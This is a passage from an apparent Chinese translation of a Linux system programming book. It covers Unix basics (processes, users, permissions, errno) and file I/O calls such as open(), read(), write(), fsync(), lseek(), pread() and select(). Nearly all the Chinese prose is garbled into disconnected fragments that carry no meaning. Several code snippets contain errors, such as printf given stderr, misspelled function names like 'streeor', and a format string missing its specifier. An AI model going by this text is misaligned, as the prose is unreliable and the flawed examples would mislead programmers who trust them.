g。更的读时设备 end-of-file(EOF。读
或以何的读。设备设备文件 (character
– 12 –
1
device file) 进。
相设备同以的方式进。设备将
映射的设备上空间以自的以何的
何以读 12 7 然读 12。设备存设
备、、、 CD-ROM 存的设备们设备
文件 (block device files) 进。
( FIFOs进出的以文件
的进程间 (IPC) 文件进。将
程的出以的方式给程程的。们
调内存何文件存。
文件进。 FIFO 文件相的进程以
文件进。
的文件。进程间的
式同进程进同同以。实
上程的。们出 Unix
进的式。相上的
对的 Unix 文件上的文
件进文件文件。
1.4.7 文件系统和名字空间
同的 Unix Linux 提的文件的
空间。操作将的空间。
上的文件能 A:\plank.jpg 文件进 C:\。 Unix
同上的文件 /media/floppy/plank.jpg 或 /home/captain/stuff/-
plank.jpg 的文件同空间的。
Unix 的空间的。
文件以的文件的集。文件能
的文件的空间的。操作(mounting
(unmounting)。文件空间的
。文件的以。 CD
/media/cdrom然以 CD 上的文件的
。的文件空间的 /文件。 Linux
– 13 –
1
文件。的的文件
。
文件存理上的(存上同时 Linux
存内存上的文件的文件。理文件
存 CD、 、 存 或 存 设 备。 设 备
的们以操作的文件。 Linux
的文件 (的文件)文
件(media-specific filesystems( ISO9660文件(NFS原
文件(ext3 Unix 的文件(XFS以及 Unix 文件
(FAT。
设备小单设备的理单。
2 的 512 。设备或更小的单
。的 I/O 操作或上。
同文件小的单文件的
对理的 2 的小的。
的小小页的小(小的内存理单件
件。小 512B 1KB 4KB。
的 Unix 单空间上的进程
。 Linux 进程的空间进程
文件的。子进程进程的
空间进程以的自
的空间。
1.4.8 进程
文件 Unix 的进程文件。进程
的的、存的、的程。进程
、、以及的。
进程周。内能
的式(Linux 的式 ELF以。
式段。段性内存的性
。段内的将同相同的同
的的。
– 14 –
1
的段段段 bss 段。段
读读。段的
的 C 读写的。 bss 段的
C C 的 0上的
存 0。相以单的 bss 段的内
将映射 0 页( 0 的内存页进内存的段性能们设
bss 段。 block started by symbol或 block
storage segment 的写。 ELF 的段绝对段(absolut
section(段(。
进程内理的进程的
操作能调。时、文件
件进程。进程的进程相的存
内进程的进程。
进程的。 Linux 内式内存给进
程提处理内存的。进程的进程
。给的进程的进程调
。将的新进进程调将的处理
进程进程。的进程的
性空间内存。内存页调内
进程存上进程操作自的空间。内
处理的件理操作能理
的进程。
1.4.9 线程
进程或程(程程进程的
单。程进程的。
进程程们单程的(single-thread
程的进程程的(multithreaded。上 Unix
、进程时间、的进程对程
的。以 Unix 程单程。
程(同程上的进程存)、处
理、的(处理的。进程的
– 15 –
1
程。
Linux 内实的程们然的(
空间进程。空间 Linux POSIX1003.1c
实程(pthread。 Linux 程实的 Native POSIX Threading Li-
brary(NPTL glibc 的。
1.4.10 进程体系
进程的即进程 ID(pid。进程的
pid 1进程新的的 pid。
Linux 进程的的进程。进
程以进程 init 进程 ( init(8程) 。新进程
fork(调。 fork(调进程原进程进程新进
程子进程。进程进程进程。进程
子进程内将 init 进程的进程。
进程即。相内将内存存
进程的内进程进程的进程
。进程的的子进程子进程的。
进程进程的进程 (zombie)。 init 进
程的子进程的子进程处。
1.4.11 用户和组
Linux 进。的
ID(uid。进程 ID 进程的
进程的真实 uid(real uid)。 Linux 内 uid 的。
id 自或。们
对的 id 存 /etc/passwd 程将映射相的 uid 上。
的程 login(1) 程提。提的
login(1) 程将 /etc/passwd shell(login
shell)将 id 作进程的 uid。子进程进程的 uid。
uid 0 超 root 的 id。超何的
root 进程的 uid。 login(1) 的超理。
真实 UID(real uid) 进程效 UID(effective uid)
– 16 –
1
uid(saved uid) 文件 uid(filesystem uid)。真实 UID(real uid) 进
程的效 UID(effective uid) 以进程的
uid(saved uid) 存原的效 UID(effective uid)的将
效 UID(effective uid) 。文件 uid 效 UID(effective uid) 相
文件的。
属或 /etc/passwd 的
(primary group或(login group能 /etc/group
。 进 程 ID(gid) 真 实 gid(real gid) 效
gid(effective gid) gid(saved gid) 以及文件 gid(filesystem gid)。进程
。
进程满时能进操作。的
Unix 的原单 uid 0 的进程以的的进程
。 Linux 更效率的的单
的方式内进更的设。
1.4.12 权限
Linux 上的文件 Unix 。
文件属以及集。
、属以及对文件进读、写的。对
9 。文件存文件的 indoe 。
对文件然的们读文件写文件
文件的。然文件实读写的内文件自
文件上的读写文件的文件上
。的读的内出写新的
进。 1-1 出 9 们
的 8 进(的 9 示方式文( ls 示的对的
。 1-1
Bit Octal value Text value Corresponding permission
8 400 r-------- Owner may read
7 200 -w------- Owner may write
6 100 --x------ Owner may execute
– 17 –
1
5 040 ---r----- Group may read
4 020 ----w---- Group may write
3 010 -----x--- Group may execute
2 004 ------r-- Everyone else may read
1 002 -------w- Everyone else may write
0 001 --------x Everyone else may execute
Unix 的 Linux (ACLs ACLs 更
、及理性存的。
1.4.13 信号
单异步能内进程能
进程进程或进程给自。进程件段
或 Ctrl+C。
Linux 内实 30 (实的
文示。 SIGHUP 示 i386 上
的 1.
SIGKILL(进程 SIGSTOP(进程进程能
的进。们以的处理操作能进
程、内存(coredump、进程或的
操作。进程以式的或处理。
将处理。处理将写的处理程将
时处理处理程将程给
原的程的处。
1.4.14 进程间通讯
进程的件操作的工作
。 Linux 内实的 Unix 的进程间(IPC System V
POSIX 同的以及 Linux 自的。
Linux 的进程间
内存空间(Futexes。
– 18 –
1
1.4.15 头文件
Linux 程离的文件。内 glibc 程提
文件。文件 C (,<string.h>以及 Unix 的献(
<unistd.h>。
1.4.16 错误处理
处理的。程
的示的 errno 。 glibc 对调
的 errno 提。提及的。
的( -1调
的。调提的原
errno 的原。
<errno.h>
extern int errno;
erron 的 errno 设示( -1时间效,
何的以。
errno 以读写的(lvalue。 errno 的
的文对。处理 #define 同将 errno 映射相的
上。处理 EACCESS 1示 1-2 上
相的文。
– 19 –
1
Preprocessor define Description
E2BIG
EACCESS
EAGAIN
EBADF
文件
EBUSY
设备或
ECHILD
子进程
EDOM
内
EEXIST
文件存
EFAULT
EFBIG
文件
EINTR
调
EINVAL
效
EIO
I/O
EISDIR
EMFILE
文件
EMLINK
ENFILE
文件出
ENODEV
设备
ENOENT
文件或
ENOEXEC
式
ENOMEM
内存
ENOSPC
设备空间
ENOTDIR
ENOTTY
理 I/O 操作
ENXIO
设备或
EPERM
操作
EPIPE
ERANGE
EROFS
读文件
ESPIPE
ESRCH
进程
ETXTBSY
文文件
EXDEV
文件
– 20 –
1
C 提将 errno 对的文。
时的处理操作以处理
errno 进处理。
的 perror():
#include <stdio.h>
void perror(const char *str);
stderr(出出以 str 的
间然 errno 的的。出更
的的
if (close (fd) == -1)
perror (”close”);
C 提 streeor() strerror r(), 原
#include <string.h>
char * strerror (int errnum);
#include <string.h>
int strerror_r(int errnum, char *buf, size_t len);
errnum 的的。能程
以的 perror() streeror() 。方
程 (thread-safe) 的。
strerror r() 程的 buf 的 len 的写
。 streeror r() 时 0时 -1的
时设 errno。
对的内的的。
errno 调设 0调进(真
时 0 。
errno = 0;
arg = strtoul (buf, NULL, 0);
– 21 –
1
if (errno)
perror (”strtoul”);
errno 时的调以 errno。
以的
if (fsync (fd) == -1) {
printf (stderr, ”fsync failed!\n”);
if (errno == EIO)
fprintf (stderr, ”I/O error on %d!\n”, fd);
}
调 errno 的存
if (fsync (fd) == -1) {
int err = errno;
fprintf (stderr, ”fsync failed: \n”, strerror
(errno));
if (err == EIO) {
/* if the error is I/O-related, jump ship */
fprintf (stderr, ”I/O error on %d!\n”, fd);
exit (EXIT_FAILURE);
}
}
的单程程 errno 。然
程程程自的 errno程的。
1.5 开始系统编程
Linux 程的展示程的 Linux 。
将文件 I/O。然读写文件然 Linux 实
文件相的文件 I/O文件的。
然的上的时进真
的程。们。
– 22 –
2
文件 I/O
第 2 章
文件 I/O
文件读写的。操作 Unix 的。
将 C 的 I/O更的 I/O
。以文件操作文件 I/O 的。
对文件进读写操作文件。内进程
文件的文件 (file table)。文件
(file descriptors)(写作 fds的进。的
文件的文件备 inode 内存的
(文件式)。空间内空间文件作进
程的 cookies。文件文件的操作(读写
文件作。
子进程进程的文件。文件、
式文件的。进程文件的 (子进程文
件进程的文件。然将的以
子进程进程的文件(程。
文件 C 的 int 示。 fd t 示
然上实上 Unix 的。 Linux 进程
文件的上。文件 0 上小 1。的上
1,024以将设 1,048,576。的文件以
-1 示能文件的。
进程的文件 0 1 2进程
式的们。文件 0 (stdin文件 1
出(stdout文件 2 (stderr。 C 提处理
STDIN FILENO STDOUT FILENO STDERR FILENO 以对以上
的。
的文件文件的设备
文件、、以及空间、 FIFOs 。文件的理
何能读写的东以文件。
– 23 –
2
文件 I/O
2.1 打开文件
的文件的方 read() write() 调。文件能
open() 或 creat() 调。毕
close() 调文件。
2.1.1 open() 系统调用
open() 调文件文件。
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int open (const char *name, int flags);
int open (const char *name, int flags, mode_t
mode);
open() 调将 name 给出的文件的文件相
文件设零文件 flags 给出的
2.1.1.1 open() 的 flags 参数
flags 以 O RDONLY O WRONLY 或 O RDWR。
自读写读写式文件。
的以读方式文件 /home/kidd/madagascar 。
int fd;
fd = open (‘‘/home/kidd/madagascar’’, O_RDONLY);
if (fd==-1)
/* error */
以写式的文件能读然。进程的能
调 open() 调对文件进。
flags 以以或进或以文件
的。
– 24 –
2
文件 I/O
O APPEND
文件将以式。写操作文件
将文件。即进程写操作
文件进程写操作
。(的式)
O ASYNC
文件写或读时( SIGIO。
能文件。
O CREAT
name 的文件存时将内。文件存
效给出 O EXCL 。
O DIRECT
文件 I/O(的 I/O。
O DIRECTORY name open() 调将。
opendir() 内。
O EXCL
O CREAT 给出的时 name 给的文件存
open() 调。文件时出。
O LARGEFILE 给文件时将 64 2G 的文件能
。 64 文件的。
O NOCTTY
给出的 name 设备( /dev/tty),
将进程的即进程
。。
O NOFOLLOW name open() 调 。
文 件。 给 出 的
调 。 name /etc/ship/-
plank.txt plank.txt 调 。然
etc 或 ship plank.txt
调。
O NONBLOCK 以文件将式。 open() 调
何操作进程 I/O (sleep)。能
FIFO。
O SYNC
文件同步 I/O。写写操作
的 读 操 作 同 步 的 以 对 读 操 作
。 POSIX O DSYNC O RSYNC Linux
上 O SYNC 同。(的O SYNC
。
– 25 –
2
文件 I/O
O TRUNC
文件存文件写将文件的
0。对 FIFO 或设备。文件
上。文件写以 O TRUNC
O RDONLY 同时的。∗
int fd;
fd = open (”/home/teach/pearl”, O_WRONLY |
O_TRUNC);
if (fd == -1)
/* error */
2.1.2 新文件所有者
新文件单的文件的 id
文件的进程的效 id。。将文
件的进程的 id 文件。 System V 的(Linux 以
System V Linux 的处理方。
然的 BSD 自的: 文件的上的
id。 Linux 上实∗文件上设
设 ID (setgid) Linux 的将。 Linux
V 的(新文件进程的 ID BSD (新文件
上 id真的 chown() 调
设。
文件的。
2.1.3 新文件权限
给出的 open() 调方式的。新文件
mode O CREAT 给出时。 O CREAT
时提 mode 的以
∗ O TRUNC | O RDONLY 的 Linux (2.6 内 +GCC4.2)将同
O TRUNC。
∗对 bsdgroups 或 sysvgroups。
– 26 –
2
文件 I/O
文件时 mode 提新文件的。文件
时以以进相的操作设文件读
文件进写操作。
mode 的 Unix 集进 0644(以读
写能读。 POSIX 对实的
同的 Unix 设何自的。上的
性 POSIX 以进或操作的以满对 mode 的
。
S IRWXU 读写。
S IRUSR
读。
S IWUSR 写。
S IXUSR
。
S IRWXG 读写。
S IRGRP
读。
S IWGRP 写。
S IXGRP
。
S IRWXO 何读写。
S IROTH 何读。
S IWOTH 何写。
S IXOTH 何。
实上写的 mode 文件的
(即 umask) 操作。的 umask 的 open() 给出的
mode 操作时。的 umask 022 将 mode 0666
0644(0666 & ∼022)。对程设时 umask
umask 对的程对新文件时的。
子 的 对 文 件 file 进 写 操 作。 文 件 存
umask 022将 0644 的文件(即 mode
0664。存的 0
int fd;
– 27 –
2
文件 I/O
fd = open (file, O_WRONLY | O_CREAT | O_TRUNC,
S_IWUSR | S_IRUSR | S_IWGRP| S_IRGRP |
S_IROTH);
if (fd == -1)
/* error */
2.1.4 creat() 函数
O WRONLY | O CREAT | O TRUNC 以
调实。
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int creat (const char *name, mode_t mode);
的的 e。 Ken Thompson Unix 的
设 Unix 的。
的 creat() 调
int fd;
fd = creat (file, 0644);
if (fd == -1)
/* error */
int fd;
fd = open (file, O_WRONLY | O_CREAT | O_TRUNC,
0644);
if (fd == -1)
/* error */
– 28 –
2
文件 I/O
即以空间上单 creat() 的能 Linux 上∗
creat() 调
int creat (const char *name, int mode)
{
return open (name, O_WRONLY | O_CREAT |
O_TRUNC, mode);
}
open() 以
的。 creat() 调性。新以 glibc
实 creat()。
2.1.5 返回值和错误码
open() creat() 调时文件。时 -1
将 errno 设的( errno出能的
。处理文件的的文件操作
处理, 的方式提示文件或程。
2.2 用 read() 读取文件
何文件我们何读。的
我们将写操作。
、的读文件的 read() 调。调
POSIX.1
#include <unistd.h>
ssize_t read (int fd, void *buf, size_t len);
调 fd 的文件的读 len buf 。
时将写 buf 的。出时 -1设 errno。 fd 文
∗调上的。 i386 creat() 调
Alpha 。以上 creat()然能调
。
– 29 –
2
文件 I/O
件将的读的。
文件(设备文件文件读操作
。
单。的子 fd 的文件读存 word
。读 unsigned long 的小 32 Linux 上 4
64 8 。时 nr 存读出 nr
-1
unsigned long word;
ssize_t nr;
/* read a couple bytes into ’word’ from ’fd’ */
nr = read (fd, &word, sizeof (unsigned long));
if (nr == -1)
/* error */
的实: 调能读 len 能
段处理的。的的
。我们何进。
2.2.1 返回值
len 小的零对 read() 的。出
能的原读的 len
调能能( fd 。
的调 read() 时 0 的。文件时
read() 调 0, 文件 (EOF)然
读。 EOF ( -1示文件
文件效何读。然
调读 len 读调将(
以读(设文件式
读。 EOF 时同。
读同的。 EOF 的文件。的
读操作更的或设备文件读的时
。
– 30 –
2
文件 I/O
以的。 read() 调读何
-1( 0能 EOF 设 errno
EINTR。以新提读。
对 read() 的调实能的
• 调 len 的。 len 读存 buf 。
。
• 调零小 len 的。读的存 buf 。
出读程或读效
零 len 时或读 len EOF。进读
(更新 buf len 的将读 buf 的空间或出
的原。
• 调 0。 EOF。以读的。
• 调的读的。式
。
• 调 -1 errno 设 EINTR。示读
。以新进调。
• 调 -1 errno 设 EAGAIN。示读的
读。式。
• 调 -1 errno 设同 EINTR 或 EAGAIN 的。示
更的。
2.2.2 读入所有的字节
处 理 的 读 len ( 读
EOF单的 read() 的。的
件。
ssize_t ret;
while (len != 0 && (ret = read (fd, buf, len)) !=
0) {
if (ret == -1) {
if (errno == EINTR)
– 31 –
2
文件 I/O
continue;
perror (”read”);
break;
}
len -= ret;
buf += ret;
}
段处理。 fd 的文件读 len
buf 读读 len 或 EOF 。读
零 len len 读 buf 相的
新调 read()。调 -1 errno EINTR将新
调更新。调 -1 errno 设将调 perror()
。
读的的。 bug 程
处理读的。
2.2.3 非阻塞读
时程读时 read() 调。相们
读时调即。 I/O
的进 I/O 操作操作文件时
文件的。
以 errno 的:EAGAIN。的给
出的文件(open() 给 O NONBLOCK; open()
的 flags 读 read() 调 -1设 errno
EAGAIN 。进 I/O 时 EAGAIN将
能的。能的
char buf[BUFSIZ];
ssize_t nr;
start:
nr = read (fd, buf, BUFSIZ);
if (nr == -1) {
– 32 –
2
文件 I/O
if (errno == EINTR)
goto start; /* oh shush */
if (errno == EAGAIN)
/* resubmit later */
else
/* error */
}
处理 EAGAIN 时 goto start 能实上
— I/O 即。能
时间相更的的。
2.2.4 其他错误码
的示程或(对 EIO 。 read()
能的 errno
[EBADF] 给出的文件或读方式的。
buf 调进程的空间内。
EFAULT
EINVAL 文件对的对读。
EIO I/O 。
2.2.5 read() 大小限制
size t ssize t POSIX 。 size t 存小
的。 ssize t 的 size t (示。 32
上对的 C unsigned int int。
ssize t 的小给 size t 的作出。
size t 的 SIZE MAX ssize t 的 SSIZE MAX。 len
SSIZE MAX read() 调的的。 Linux 上
SSIZE MAX LONG MAX 32 上即 0x7fffffff。对读
。的读作
的读方式能
– 33 –
2
文件 I/O
if (len > SSIZE_MAX)
len = SSIZE_MAX;
len 零的 read() 调的即 0。
2.3 用 write() 来写
的 写 文 件 的 调 write()。 write() read() 相 对
POSIX.1 。
#include <unistd.h>
ssize_t write (int fd, const void *buf, size_t
count);
write() 调文件 fd 文件的将 buf
count 写文件。的文件(设备
写。
时写更新文件。时 -1将 errno
设相的。 write() 以 0何
示写零。
read() 的单
const char *buf = ”My ship is solid!”;
ssize_t nr;
/* write the string in ’buf’ to ’fd’ */
nr = write (fd, buf, strlen (buf));
if (nr == -1)
/* error */
read() 然相的单。调出
写的能。
unsigned long word = 1720;
size_t count;
– 34 –
2
文件 I/O
ssize_t nr;
count = sizeof (word);
nr = write (fd, &word, count);
if (nr == -1)
/* error, check errno */
else if (nr != count)
/* possible error, but ’errno’ not set */
2.3.1 部分写
相对 read() 的读的 write() 能写的
。对 write() 调 EOF 。对文件
write() 将写的。
对 文 件 进 写 。然 对
真的写的
。的处 write() 调能
调进写(。
的示
ssize_t ret, nr;
while (len != 0 && (ret = write (fd, buf, len))
!= 0) {
if (ret == -1) {
if (errno == EINTR)
continue;
perror (”write”);
break;
}
len -= ret;
buf += ret;
}
– 35 –
2
文件 I/O
2.3.2 追加模式
fd 式时( O APPEND 写操作文
件的文件。
设进程同文件写。式的
进程文件写进程进程的文件
将文件将文件进程写的的
方。进程进式的同步能进写操作
们存件。
式的。文件文件
的写操作的即写。以写的文件
更新操作原子操作。文件更新写的。
write() 调更新文件自的能的原
read() 调。
式更新文件方
处。
2.3.3 非阻塞写
fd 式时(设 O NONBLOCK )的
写操作时 write() 调 -1设 errno EAGAIN。
新。处理文件时出。
2.3.4 其他错误码
的
EBADF
给的文件或以写方式的。
EFAULT buf 进程空间内。
item [EFBIG] 写操作将文件小超进程的文件或内
实的。
item [EINVAL] 给的文件对的对能进写操作。
item [EIO] I/O 。
item [ENOSPC] 文件的文件的空间。
item [EPIPE] 给文件的或的读。进程
– 36 –
2
文件 I/O
将 SIGPIPE 。 SIGPIPE 的
的进程。进程能或处理时
。
2.3.5 write() 大小限制
count SSIZE MAX write() 调的的。 count
零的 write() 调将即 0。
2.3.6 write() 的行为
write() 调时内将提的内
写的文件。 write 调对的
实。处理的异。
空间 write() 调时 Linux 内进然
将。内集的”
将们写上(程写。 write 调
上调。内以将写操作空段将写操
作处理。
写 POSIX 的。 read 调
读写写的将
读上的。实上提效率 read
内存存读。读写
然提写
即对程写操作写
。
写的对写的能性。
能的写以们将写出性能方的
内将的新。时
将写。绝的实上写
。
写的 I/O 的。何写出的
I/O 方理给写的
进程。实上进程的。进程能更新同
– 37 –
2
文件 I/O
的进程能写出。
能写操作的进程
内将写的小。时写内
存时效将的存们超给时效写。
以 /proc/sys/vm/dirty expire centiseconds 。以
(。
文件存写以的以将的写操作同步。将
的同步 I/O。
内内将 Linux 内的写子。
2.4 同步 I/O
同步 I/O 的写相的。
写提的性能进以子的
实写。然写的时间。对
Linux 内提性能同步操作。
2.4.1 fsync() 和 fdatasync()
单的写的方 fsync() 调 POSIX.1b
#include <unistd.h>
int fsync (int fd);
调 fsync() 以 fd 对文件的写上。文件 fd
以写方式的。调写以及的时间 inode 的属性
。写。
将写存时 fsync() 能上
。能写能的存上。
的存的将写。
Linux 提 fdatasync() 调
#include <unistd.h>
– 38 –
2
文件 I/O
int fdatasync (int fd);
调的 fsync() , 写。调
同步上能。。
相同的单
int ret;
ret = fsync (fd);
if (ret == -1)
/* error */
调何更新的文件的同步
上。文件更文件能写
相的上文件。何对的更
新同步上对调 fsync() 进同步。
2.4.2 返回值和错误码
时调 0。时 -1将 errno 设以
EBADF
给的文件以写的。
EINVAL 给的文件对的对同步。
EIO
同步时 I/O 。示真的 I/O
处。
即相文件上实 fdatasync() 实 fsync(), 调
fsync() 时。的能 fsync() EINVAL 时
fdatasync()示
if (fsync (fd) == -1) {
/*
* We prefer fsync(), but let’s try fdatasync(
)
* if fsync( ) fails, just in case.
– 39 –
2
文件 I/O
*/
if (errno == EINVAL) {
if (fdatasync (fd) == -1)
perror (”fdatasync”);
} else
perror (”fsync”);
}
POSIX fsync() 的 fdatasync() 的 fsync()
的、文件的 Linux 文件实。然文件
(能同步的文件或的文件或
实 fdatasync()。
2.4.3 sync()
sync() 调以对上的进同步, 效率
然
#include <unistd.h>
void sync (void);
。的
能写。∗
sync() 写
调将将写的程即。同步
以的的写。然对 Linux sync()
的写。调 sync() 。
sync() 真上的方工 sync 的实。程 fsync()
fdatasync() 将文件的同步。的能
的上 sync() 操作能的时间。
∗以, 以能, 内写
上实上们存。
– 40 –
2
文件 I/O
2.4.4 O SYNC 标志
O SYNC open() 文件上的 I/O 操作同步。
int fd;
fd = open (file, O_WRONLY | O_SYNC);
if (fd == -1) {
perror (”open”);
return -1;
}
读同步的。同步将读的效
性。然的 write() 调同步的。调
写间。 O SYNC 将
write() 调进 I/O 同步。
O SYNC write() 操作式 fsync()。
上的 Linux 内实的 O SYNC 更效。
O SYNC 将写操作及内时间(内空
间的时间。写文件的小能的时间进
程的 I/O 时间 ( I/O 的时间) 上时的 O SYNC 时
。时间的以同步 I/O
的。
写的以 fsync() 或 fdata-
sync()。的调(性的操作相对
O SYNC 更。
2.4.5 O DSYNC 和 O RSYNC
POSIX open() 同 步 相 的 O DSYNC
O RSYNC。 Linux 上 O SYNC 同们相同的。
O DSYNC 写操作同步同
步。写式调 fdatasync() 。 O SYNC 提
更的以 O DSYNC 时能
– 41 –
2
文件 I/O
O SYNC 更的性能。
O RSYNC 读写进同步。能
O SYNC 或 O DSYNC 。文读操作同步的
给的时。 O RSYNC 何读操作的作
同步的。读操作更新调写
。实 read() 调文件时间更
新上的 inode 。 Linux 将 O RSYNC 设
O SYNC ( O SYNC O DSYNC 的同。 Linux
O RSYNC 的对的方式 read() 调调
fdatasync()。实上操作。
2.5 直接 I/O
操作内 Linux 内实的存、
以及设备间的 I/O 理的(内内。
性能能的进的 I/O 理。 I/O
实实上操作的工工
更的性能。然们自的存以能的
操作的。
open() O DIRECT 内小 I/O 理的。
时 I/O 操作将页存对空间设备进
。的 I/O 将同步的操作。
I/O 时对文件设备
小 ( 512 ) 的。 2.6 内更 2.4
的东对文件小( 4KB。性
对更的(更的小。
2.6 关闭文件
程对文件的操作以 close() 调将文件
对的文件。
#include <unistd.h>
– 42 –
2
文件 I/O
int close (int fd);
close() 调的文件的离进程文件的
。给的文件效内以将作的 open() 或 creat()
调的新。 close() 调时 0。时 -1设
errno 相。单
if (close (fd) == -1)
perror (”close”);
的文件文件写。
文件写同步 I/O的同步。
然文件的作。文件的文件
内示文件的。时文件的
inode 的内存。 inode 能内存
(能内存内效率存 inode能
。文件上
inode 内存真的。对 close() 的调能
的文件上。
2.6.1 错误码
的 close() 的。处理能
的。操作的原能出 close()
。
以出时能出的 errno 。 EBADF(给的文件
的 EIO能实的 close
操作相的 I/O 。出的文件的
的的。
POSIX close() 绝 EINTR。 Linux 内们能
的实。
– 43 –
2
文件 I/O
2.7 用 lseek() 查找
的文件的 I/O 性的读写的文件的式更新
的。然文件。 lseek()
调能对给文件的文件设。更新文件
的何何 I/O。
#include <sys/types.h>
#include <unistd.h>
off_t lseek (int fd, off_t pos, int origin);
lseek() 的以以
SEEK CUR 文件 fd 设上 pos pos 以零或
。零的 pos 文件。
SEEK END 文件 fd 设文件上 pos pos 以零
或。零的 pos 设文件。
SEEK SET 文件 fd 设 pos。零的 pos 设文件
。
调时新文件。时 -1 设的 errno 。
设文件 fd 1825
off_t ret;
ret = lseek (fd, (off_t) 1825, SEEK_SET);
if (ret == (off_t) -1)
/* error */
或设文件 fd 文件
off_t ret;
ret = lseek (fd, 0, SEEK_END);
if (ret == (off_t) -1)
/* error */
– 44 –
2
文件 I/O
lseek() 更新的文件以 SEEK CUR 零文件
int pos;
pos = lseek (fd, 0, SEEK_CUR);
if (pos == (off_t) -1)
/* error */
else
/* ’pos’ is the current position of fd */
然 lseek() 的文件的或
文件的文件。
2.7.1 文件末尾之后进行查找
lseek() 以文件超文件进的。
的将 fd 对的文件 1688 。
int ret;
ret = lseek (fd, (off_t) 1688, SEEK_END);
if (ret == (off_t) -1)
/* error */
对文件文件
的读 EOF。然对写新
间新的空间零。
零方式空(hole。 Unix 的文件上空
何理上的空间。示文件上文件的小
以超的理小。空的文件文件(sparse file。文
件以的空间提效率操作空何理 I/O。
对文件空的读将相的进零。
– 45 –
2
文件 I/O
2.7.2 错误码
出时 lseek() -1将 errno 设
EBADF
给出的文件何的文件。
EINVAL
origin 的 SEEK SET SEEK CUR 或 SEEK END
或的文件。实上出 EIN-
VAL 的的。时的
能的时。
EOVERFLOW 的文件能 off t 示。 32
上。文件示能
。
ESPIPE
给出的文件能操作的对上
FIFO 或。
2.7.3 限制
文件的上 off t 的小。 C
的 long Linux 上(存的小。内实
内将存 C 的 long long 。处理方 64 上
32 上作相时能 EOVERFLOW 。
2.8 定位读写
Linux 提 read() write() 的 lseek()调以
读写的文件。时文件。
读式的调 pread()
#define _XOPEN_SOURCE 500
#include <unistd.h>
ssize_t pread (int fd, void *buf, size_t count,
off_t pos);
调文件 fd 的 pos 文件读 count buf 。
– 46 –
2
文件 I/O
写式的调 pwrite()
#define _XOPEN_SOURCE 500
#include <unistd.h>
ssize_t pwrite (int fd, const void *buf, size_t
count, off_t pos);
调文件 fd 的 pos 文件写 count buf 。
们文件调的 read()、 wirte()
们 pos 提的。调时们
文件。何的 read() write() 调能读写的
。
读写调能以进操作的文件。
相调 read() 或 write() lseek() 进
: 调更单文件
性的操作时更。, 操作时文件。
的何 lseek() 时能出的。
程文件能程调 lseek() 进读写操作
程文件。我们以 pread() pwrite()
的。
2.8.1 错误码
时调读或写的。 pread() 零示 EOF对
pwrite()零调写何东。出时 -1 设
errno 相。对 pread() 何对 read() 或 lseek() 的 errno 能
出的。对 pwrite() 何 write() 或 lseek() 的 errno 能出的。
2.9 截短文件
Linux 提调文件 POSIX
(同程的实。们
– 47 –
2
文件 I/O
#include <unistd.h>
#include <sys/types.h>
int ftruncate (int fd, off_t len);
#include <unistd.h>
#include <sys/types.h>
int truncate (const char *path, off_t len);
调将文件 len 的。 ftruncate() 调操作
的写的文件 fd。 truncate() 调操作 path 的
写文件。时 0。时 -1设 errno 相。
调的将文件原文件小。
时文件 len。 len 间的将
读。
们以将文件原更文件
上写操作的。扩展出的将零。
操作文件。
内的 74 小的文件 pirate.txt
Edward Teach was a notorious English pirate.
He was nicknamed Blackbeard.
同的程:
#include <unistd.h>
#include <stdio.h>
int main( )
{
int ret;
– 48 –
2
文件 I/O
ret = truncate (”./pirate.txt”, 45);
if (ret == -1) {
perror (”truncate”);
return -1;
}
return 0;
}
45 的文件
Edward Teach was a notorious English pirate.
2.10 I/O 多路复用
程 文 件 上
(stdin、进程间以及同时操作文件。件的
(GUI的能上的件。∗
程处理文件的进程文
件上同时。文件处备读写的同时操作文
件的。程出备的文件
( read() 调读)进程将
能操作文件。能的
。然文件何能
。文件的 I/O 相的 ()能文件
文件以处。
对程同时的的。
: 设备出进程
间相的文件上。的 IPC 文件
能。的操作
I/O 以作的方。
I/O以 I/O 的。方
∗对何写 GUI 的的 GNOME GLib的
提的。件。
– 49 –
2
文件 I/O
方效率。进程以的方式 I/O
操作的文件备进 I/O。设。
程以的将更效以处理进工作或更
文件以进 I/O 时。
进 I/O 。
I/O 文件上同时以读
写时。时 I/O 的 I/O
的设以原
1. I/O 何文件备 I/O 时我
2. 或更文件处。
3. 备
4. 的处理 I/O 的文件。
5. 步新。
Linux 提 I/O 方 select poll epoll。我们
我们将 Linux 的方。
2.10.1 select()
select() 调提实同步 I/O 的
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
int select (int n,
fd_set *readfds,
fd_set *writefds,
fd_set *exceptfds,
struct timeval *timeout);
FD_CLR(int fd, fd_set *set);
FD_ISSET(int fd, fd_set *set);
FD_SET(int fd, fd_set *set);
FD_ZERO(fd_set *set);
– 50 –
2
文件 I/O
的文件备 I/O 或超的时间 select() 调
。
的文件以同的件。 readfds 集
的文件读(读操作以的
。 writefds 集的文件写操作以
。 exceptefds 的文件出异或
出 (out-of-band) (。的集能
空 (NULL)相的 select() 对时间进。
时集对的 I/O 的文件。
readfds 集文件 7 9。调时 7 集
文件备进 I/O 。 9 集能
读时。(我能能调
。 select() 调时将文件
的。∗
n集文件的。 select()
的调的文件将给。
timeout timeval 的
#include <sys/time.h>
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* microseconds */
};
NULL即时文件处 I/O
select() 调将 tv sec tv usec 。时的
Unix 的。的调新
(集的文件。新的 Linux 自将的时
间。时 5 文件备时 3 tv.tv sec
时 2。
∗ select() poll() 的。将的 epoll()
以方式工作。操作单时 I/O 件。
– 51 –
2
文件 I/O
时的零调即调时件对
的文件何件。
集的文件操作操作进理。
Unix 的方式实将实。
FD ZERO 集文件。 select() 调
。
fd_set writefds;
FD_ZERO(&writefds);
FD SET 集文件 FD CLR 集
文件。
FD_SET(fd, &writefds); /* add ’fd’ to the set */
FD_CLR(fd, &writefds); /* oops, remove ’fd’ from
the set */
设的 FD CLR。。
FD ISSET 文件给集。
零 0 示。 select() 调 FD ISSET
文件。
if (FD_ISSET(fd, &readfds))
/* ’fd’ is readable without blocking! */
文件集的以对文件的上文
件的 FD SETSIZE 设。 Linux 上
1024。我们将的作。
2.10.2 返回值和错误码
时 select() 集 I/O 的文件的。
给出时能 0。时 -1 errno 设
EBADF
集的文件。
– 52 –
2
文件 I/O
EINTR
时以新调。
EINVAL
n 或给出的时。
ENOMEM 的内存。
2.10.2.1 select() 示例程序
我们的程然单对 select() 的
。子 stdin 的的时设 5 。
文件实上 I/O 调的。
#include <stdio.h>
#include <sys/time.h>
